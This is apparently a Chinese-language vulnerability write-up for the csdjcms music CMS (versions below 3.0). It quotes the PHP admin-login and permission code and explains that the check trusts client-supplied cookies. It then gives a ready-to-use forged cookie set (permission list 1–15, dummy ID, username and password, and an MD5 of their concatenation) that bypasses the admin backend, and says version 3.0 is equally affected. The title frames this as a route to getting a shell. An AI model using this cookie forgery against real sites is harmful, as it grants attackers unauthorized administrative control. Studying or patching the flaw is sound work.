/*******************************************************/
/* csdjcms < V 3.0 getshell Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
csdjcms 一款YY黑客与YY肥猪流喜欢用的唱歌网站。。
csdjcms V 2.5 code
[php]//老规矩首先首页开始看
include_once("include/install.php");
if(S_IsInstall==0){
header("Location:install/install.php");
}
include_once("include/label.php");
if(S_Webmode==1 or !file_exists("index.html")){
//缓存区
$cache_id ='index_';
if(!($cache_opt->start($cache_id))){
echo GetTemp("index.html",0);
$cache_opt->end();
}
}
else{
header("Location:index.html");
}
//看他配置吧
function SafeRequest($key,$mode,$isfilter=''){
set_magic_quotes_runtime(0);
$magic= get_magic_quotes_gpc();
switch ($mode){
case 'post':
$value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : '';
break;
case 'get':
$value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : '';
break;
default:
$value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : '';
if($value==""){
$value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : '';
}
break;
}
if($isfilter!=''){
$value=lib_replace_end_tag($value);
}
return $value;
}
//变量的提交进行了addslashes安全过滤
//研究了半天的源码发现后台的严重出现了大的安全问题
081
include "../include/conn.php";
include "../include/function.php";
include "admin_version.php";
include "admin_loginstate.php"; //问题出在这个文件当中
//跟入
if(empty($_COOKIE['S_AdminID'])){ //首先看是否存在s_adminid这个cooke
echo "<script>window.location='admin_login.php'</script>";
}
elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){
//这里就是问题的关键之处了
如果s_login 的值等于 四个cookie 相加的md5加密,即可直接验证通过
echo "<script>window.parent.location='admin_login.php'</script>";
}
//后台权限判断
function SystemPer($Column){
if(empty($_COOKIE['S_Permission'])){
die("<script>jAlert('对不起,您无权限操作此功能!','操作错误',function(R){window.location='javascript:history.go(-1)';})</script>");
}else{
$SystemPermission=explode(",",$_COOKIE['S_Permission']); //权限的判断,用“,”来分割成数组
$StateOK=0;
$ArrSystemPermission=count($SystemPermission);
for($k=0;$k<$ArrSystemPermission;$k++){
if($SystemPermission[$k]==$Column){ //判断
$StateOK=1;
}
}
if($StateOK==0){
die("<script>jAlert('对不起,您无权限操作此功能!','操作错误',function(R){window.location='javascript:history.go(-1)';})</script>");
}
}
}
//构造淫荡的cookies
//S_Permission
//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
//S_Login
//md5(AdminID+AdminUserName+AdminPassWord+S_Permission)
//S_AdminUserName
//1
//S_AdminPassWord
//1
//S_AdminID
//1
后台成功绕过。[/php]
[php]
//看看3.0版本,也是一样
<?php
# Name: PHP版程氏音乐CMS管理系统 v3.0
# Author: 程氏<[url=mailto:web@chshcms.com]web@chshcms.com[/url]> [QQ:848769359]
# Homepage:[url=http://www.chshcms.cn/]http://www.chshcms.cn/[/url]
$CS_Path=$_SERVER['PHP_SELF'];
$CS_Pathall=explode("/",$CS_Path);
$CS_Admin=$CS_Pathall[1]."/";
if(empty($_COOKIE['CS_AdminID'])){
echo "<script>window.parent.location='".CS_WebPath.$CS_Admin."login.php';</script>";
}
elseif($_COOKIE['CS_Login']!=md5($_COOKIE['CS_AdminID'].$_COOKIE['CS_AdminUserName'].$_COOKIE['CS_AdminPassWord'].$_COOKIE['CS_Quanx'])){
echo "<script>window.parent.location='".CS_WebPath.$CS_Admin."login.php'</script>";
}
//后台权限判断
function SystemPer($Column){
if(empty($_COOKIE['CS_Quanx'])){
die("<script>alert('对不起,您无权限操作此功能!');window.location='javascript:history.go(-1);'</script>");
exit();
}else{
$SystemPermission=explode(",",$_COOKIE['CS_Quanx']);
$StateOK=0;
$ArrSystemPermission=count($SystemPermission);
for($k=0;$k<$ArrSystemPermission;$k++){
if($SystemPermission[$k]==$Column){
$StateOK=1;
}
}
if($StateOK==0){
die("<script>alert('对不起,您无权限操作此功能!');window.location='javascript:history.go(-1);'</script>");
exit();
}
}[/php]
评论 (0)